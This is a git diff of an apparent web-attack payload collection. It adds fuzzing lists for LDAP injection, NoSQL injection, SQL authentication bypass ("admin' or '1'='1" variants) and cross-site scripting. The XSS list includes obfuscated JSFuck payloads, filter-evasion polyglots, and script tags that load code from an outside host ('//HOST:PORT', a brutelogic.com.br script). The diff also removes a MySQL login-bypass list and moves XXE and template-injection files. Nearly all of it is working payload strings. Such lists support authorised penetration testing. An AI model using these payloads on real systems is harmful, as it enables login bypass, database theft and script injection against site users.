diff --git a/LDAP injection/Intruders/LDAP_FUZZ.txt b/LDAP injection/Intruders/LDAP_FUZZ.txt new file mode 100644 index 0000000..53b53e4 --- /dev/null +++ b/LDAP injection/Intruders/LDAP_FUZZ.txt @@ -0,0 +1,45 @@ +* +*)(& +*))%00 +*()|%26' +*()|&' +*(|(mail=*)) +*(|(objectclass=*)) +*)(uid=*))(|(uid=* +*/* +*| +/ +// +//* +@* +| +admin* +admin*)((|userpassword=*) +admin*)((|userPassword=*) +x' or name()='username' or 'x'='y +! +%21 +%26 +%28 +%29 +%2A%28%7C%28mail%3D%2A%29%29 +%2A%28%7C%28objectclass%3D%2A%29%29 +%2A%7C +%7C +& +( +) +*(|(mail=*)) +*(|(objectclass=*)) +*/* +*| +/ +// +//* +@* +x' or name()='username' or 'x'='y +| +*()|&' +admin* +admin*)((|userpassword=*) +*)(uid=*))(|(uid=* diff --git a/NoSQL injection/Intruders/NoSQL.txt b/NoSQL injection/Intruders/NoSQL.txt new file mode 100644 index 0000000..180c8b3 --- /dev/null +++ b/NoSQL injection/Intruders/NoSQL.txt @@ -0,0 +1,19 @@ +true, $where: '1 == 1' +, $where: '1 == 1' +$where: '1 == 1' +', $where: '1 == 1' +1, $where: '1 == 1' +{ $ne: 1 } +', $or: [ {}, { 'a':'a +' } ], $comment:'successful MongoDB injection' +db.injection.insert({success:1}); +db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 +|| 1==1 +' && this.password.match(/.*/)//+%00 +' && this.passwordzz.match(/.*/)//+%00 +'%20%26%26%20this.password.match(/.*/)//+%00 +'%20%26%26%20this.passwordzz.match(/.*/)//+%00 +{$gt: ''} +[$ne]=1 +';sleep(5000); +';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); diff --git a/PHP include/JHADDIX_LFI.txt b/PHP include/Intruders/JHADDIX_LFI.txt similarity index 100% rename from PHP include/JHADDIX_LFI.txt rename to PHP include/Intruders/JHADDIX_LFI.txt diff --git a/SQL injection/Intruders/FUZZDB_MSSQL-WHERE_Blind.txt b/SQL injection/Intruders/FUZZDB_MSSQL-WHERE_Time.txt similarity index 100% rename from SQL injection/Intruders/FUZZDB_MSSQL-WHERE_Blind.txt rename to SQL injection/Intruders/FUZZDB_MSSQL-WHERE_Time.txt diff --git a/SQL injection/Intruders/FUZZDB_MySQL-WHERE_Blind.txt b/SQL injection/Intruders/FUZZDB_MySQL-WHERE_Time.txt similarity index 100% rename from SQL injection/Intruders/FUZZDB_MySQL-WHERE_Blind.txt rename to SQL injection/Intruders/FUZZDB_MySQL-WHERE_Time.txt diff --git a/SQL injection/Intruders/FUZZDB_MySQL_SQLi_LoginBypass.txt b/SQL injection/Intruders/FUZZDB_MySQL_SQLi_LoginBypass.txt deleted file mode 100644 index c4ba291..0000000 --- a/SQL injection/Intruders/FUZZDB_MySQL_SQLi_LoginBypass.txt +++ /dev/null @@ -1,8 +0,0 @@ -# regex replace as many as you can with your fuzzer for best results: -# -# also try to brute force a list of possible usernames, including possile admin acct names -' OR 1=1-- -'OR '' = ' Allows authentication without a valid username. -'-- -' union select 1, '', '' 1-- -'OR 1=1-- diff --git a/SQL injection/Intruders/Intruder_Auth_Bypass.txt b/SQL injection/Intruders/Intruder_Auth_Bypass.txt new file mode 100644 index 0000000..d3e9737 --- /dev/null +++ b/SQL injection/Intruders/Intruder_Auth_Bypass.txt @@ -0,0 +1,77 @@ +'-' +' ' +'&' +'^' +'*' +' or ''-' +' or '' ' +' or ''&' +' or ''^' +' or ''*' +"-" +" " +"&" +"^" +"*" +" or ""-" +" or "" " +" or ""&" +" or ""^" +" or ""*" +or true-- +" or true-- +' or true-- +") or true-- +') or true-- +' or 'x'='x +') or ('x')=('x +')) or (('x'))=(('x +" or "x"="x +") or ("x")=("x +")) or (("x"))=(("x +or 1=1 +or 1=1-- +or 1=1# +or 1=1/* +admin' -- +admin' # +admin'/* +admin' or '1'='1 +admin' or '1'='1'-- +admin' or '1'='1'# +admin' or '1'='1'/* +admin'or 1=1 or ''=' +admin' or 1=1 +admin' or 1=1-- +admin' or 1=1# +admin' or 1=1/* +admin') or ('1'='1 +admin') or ('1'='1'-- +admin') or ('1'='1'# +admin') or ('1'='1'/* +admin') or '1'='1 +admin') or '1'='1'-- +admin') or '1'='1'# +admin') or '1'='1'/* +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +admin" -- +admin" # +admin"/* +admin" or "1"="1 +admin" or "1"="1"-- +admin" or "1"="1"# +admin" or "1"="1"/* +admin"or 1=1 or ""=" +admin" or 1=1 +admin" or 1=1-- +admin" or 1=1# +admin" or 1=1/* +admin") or ("1"="1 +admin") or ("1"="1"-- +admin") or ("1"="1"# +admin") or ("1"="1"/* +admin") or "1"="1 +admin") or "1"="1"-- +admin") or "1"="1"# +admin") or "1"="1"/* +1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 diff --git a/Server Side Template injections/JHADDIX_SSI_Injection.txt b/Server Side Template injections/Intruders/JHADDIX_SSI_Injection.txt similarity index 100% rename from Server Side Template injections/JHADDIX_SSI_Injection.txt rename to Server Side Template injections/Intruders/JHADDIX_SSI_Injection.txt diff --git a/XSS injection/Intruders/IntrudersXSS.txt b/XSS injection/Intruders/IntrudersXSS.txt new file mode 100644 index 0000000..3dbd113 --- /dev/null +++ b/XSS injection/Intruders/IntrudersXSS.txt @@ -0,0 +1,179 @@ + +ipt>alert('XSS')ipt> +"> +"> + + + +xss +"> +"> + + + + +"> +"> + + +data:text/html, +data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ +jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e + ">>" ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> +" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// +';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> +javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* +javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a +javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ +javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* +javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* +javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// +javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* +--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* +/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* +javascript://--></title></style></textarea></script><svg "//' onclick=alert()// +/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* +<object onafterscriptexecute=confirm(0)> +<object onbeforescriptexecute=confirm(0)> +<script>window['alert'](document['domain'])<script> +<img src='1' onerror/=alert(0) /> +<script>window['alert'](0)</script> +<script>parent['alert'](1)</script> +<script>self['alert'](2)</script> +<script>top['alert'](3)</script> +"><svg onload=alert(1)// +"onmouseover=alert(1)// +"autofocus/onfocus=alert(1)// +'-alert(1)-' +'-alert(1)// +\'-alert(1)// +</script><svg onload=alert(1)> +<x contenteditable onblur=alert(1)>lose focus! +<x onclick=alert(1)>click this! +<x oncopy=alert(1)>copy this! +<x oncontextmenu=alert(1)>right click this! +<x oncut=alert(1)>copy this! +<x ondblclick=alert(1)>double click this! +<x ondrag=alert(1)>drag this! +<x contenteditable onfocus=alert(1)>focus this! +<x contenteditable oninput=alert(1)>input here! +<x contenteditable onkeydown=alert(1)>press any key! +<x contenteditable onkeypress=alert(1)>press any key! +<x contenteditable onkeyup=alert(1)>press any key! +<x onmousedown=alert(1)>click this! +<x onmousemove=alert(1)>hover this! +<x onmouseout=alert(1)>hover this! +<x onmouseover=alert(1)>hover this! +<x onmouseup=alert(1)>click this! +<x contenteditable onpaste=alert(1)>paste here! +<script>alert(1)// +<script>alert(1)<!– +<script src=//brutelogic.com.br/1.js> +<script src=//3334957647/1> +%3Cx onxxx=alert(1) +<%78 onxxx=1 +<x %6Fnxxx=1 +<x o%6Exxx=1 +<x on%78xx=1 +<x onxxx%3D1 +<X onxxx=1 +<x OnXxx=1 +<X OnXxx=1 +<x onxxx=1 onxxx=1 +<x/onxxx=1 +<x%09onxxx=1 +<x%0Aonxxx=1 +<x%0Conxxx=1 +<x%0Donxxx=1 +<x%2Fonxxx=1 +<x 1='1'onxxx=1 +<x 1="1"onxxx=1 +<x </onxxx=1 +<x 1=">" onxxx=1 +<http://onxxx%3D1/ +<x onxxx=alert(1) 1=' +<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)> +'onload=alert(1)><svg/1=' +'>alert(1)</script><script/1=' +*/alert(1)</script><script>/* +*/alert(1)">'onload="/*<svg/1=' +`-alert(1)">'onload="`<svg/1=' +*/</script>'>alert(1)/*<script/1=' +<script>alert(1)</script> +<script src=javascript:alert(1)> +<iframe src=javascript:alert(1)> +<embed src=javascript:alert(1)> +<a href=javascript:alert(1)>click +<math><brute href=javascript:alert(1)>click +<form action=javascript:alert(1)><input type=submit> +<isindex action=javascript:alert(1) type=submit value=click> +<form><button formaction=javascript:alert(1)>click +<form><input formaction=javascript:alert(1) type=submit value=click> +<form><input formaction=javascript:alert(1) type=image value=click> +<form><input formaction=javascript:alert(1) type=image src=SOURCE> +<isindex formaction=javascript:alert(1) type=submit value=click> +<object data=javascript:alert(1)> +<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> +<svg><script xlink:href=data:,alert(1) /> +<math><brute xlink:href=javascript:alert(1)>click +<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> +<html ontouchstart=alert(1)> +<html ontouchend=alert(1)> +<html ontouchmove=alert(1)> +<html ontouchcancel=alert(1)> +<body onorientationchange=alert(1)> +"><img src=1 onerror=alert(1)>.gif +<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> +GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; +<script src="data:&comma;alert(1)// +"><script src=data:&comma;alert(1)// +<script src="//brutelogic.com.br&sol;1.js&num; +"><script src=//brutelogic.com.br&sol;1.js&num; +<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; +"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; +<base href=//0> +<script/src="data:&comma;eval(atob(location.hash.slice(1)))//#alert(1) +<body onload=alert(1)> +<body onpageshow=alert(1)> +<body onfocus=alert(1)> +<body onhashchange=alert(1)><a href=#x>click this!#x +<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x +<body onscroll=alert(1)><br><br><br><br> +<body onresize=alert(1)>press F12! +<body onhelp=alert(1)>press F1! (MSIE) +<marquee onstart=alert(1)> +<marquee loop=1 width=0 onfinish=alert(1)> +<audio src onloadstart=alert(1)> +<video onloadstart=alert(1)><source> +<input autofocus onblur=alert(1)> +<keygen autofocus onfocus=alert(1)> +<form onsubmit=alert(1)><input type=submit> +<select onchange=alert(1)><option>1<option>2 +<menu id=x contextmenu=x onshow=alert(1)>right click me! +<script>\u0061\u006C\u0065\u0072\u0074(1)</script> +<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" /> +<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe> +<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script> +<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script> +<img src=1 alt=al lang=ert onerror=top[alt+lang](0)> +<script>$=1,alert($)</script> +<script ~~~>confirm(1)</script ~~~> +<script>$=1,\u0061lert($)</script> +<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script> +<</script/script><script ~~~>\u0061lert(1)</script ~~~> +</style></scRipt><scRipt>alert(1)</scRipt> +<img/id="alert&lpar;&#x27;XSS&#x27;&#x29;\"/alt=\"/\"src=\"/\"onerror=eval(id&#x29;> +<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)> +<svg><x><script>alert&#40;&#39;1&#39;&#41</x> +<iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'> diff --git a/XSS injection/Intruders/XSS_Polyglots.txt b/XSS injection/Intruders/XSS_Polyglots.txt index 21d6f97..52ede63 100644 --- a/XSS injection/Intruders/XSS_Polyglots.txt +++ b/XSS injection/Intruders/XSS_Polyglots.txt @@ -1,3 +1,4 @@ +jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> “ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> diff --git a/XXE injections/Classic XXE B64 Encoded.xml b/XXE injections/Files/Classic XXE B64 Encoded.xml similarity index 100% rename from XXE injections/Classic XXE B64 Encoded.xml rename to XXE injections/Files/Classic XXE B64 Encoded.xml diff --git a/XXE injections/Classic XXE.xml b/XXE injections/Files/Classic XXE.xml similarity index 100% rename from XXE injections/Classic XXE.xml rename to XXE injections/Files/Classic XXE.xml diff --git a/XXE injections/Deny Of Service - Billion Laugh Attack b/XXE injections/Files/Deny Of Service - Billion Laugh Attack similarity index 100% rename from XXE injections/Deny Of Service - Billion Laugh Attack rename to XXE injections/Files/Deny Of Service - Billion Laugh Attack diff --git a/XXE injections/XXE OOB Attack (Yunusov, 2013).xml b/XXE injections/Files/XXE OOB Attack (Yunusov, 2013).xml similarity index 100% rename from XXE injections/XXE OOB Attack (Yunusov, 2013).xml rename to XXE injections/Files/XXE OOB Attack (Yunusov, 2013).xml diff --git a/XXE injections/XXE_Fuzzing.txt b/XXE injections/Intruders/XXE_Fuzzing.txt similarity index 100% rename from XXE injections/XXE_Fuzzing.txt rename to XXE injections/Intruders/XXE_Fuzzing.txt